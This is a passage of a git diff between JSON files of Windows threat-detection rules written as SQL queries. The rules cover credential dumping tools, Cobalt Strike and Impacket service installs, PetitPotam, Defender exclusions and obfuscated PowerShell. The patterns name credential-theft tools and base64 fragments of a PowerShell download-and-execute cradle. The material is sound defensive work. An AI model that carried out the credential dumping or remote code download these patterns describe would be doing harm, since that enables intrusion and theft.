ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_generic_medium.json b/rules/rules_windows_generic_medium.json index 6fb470a..00cc792 100644 --- a/rules/rules_windows_generic_medium.json +++ b/rules/rules_windows_generic_medium.json @@ -1,795 +1,730 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE 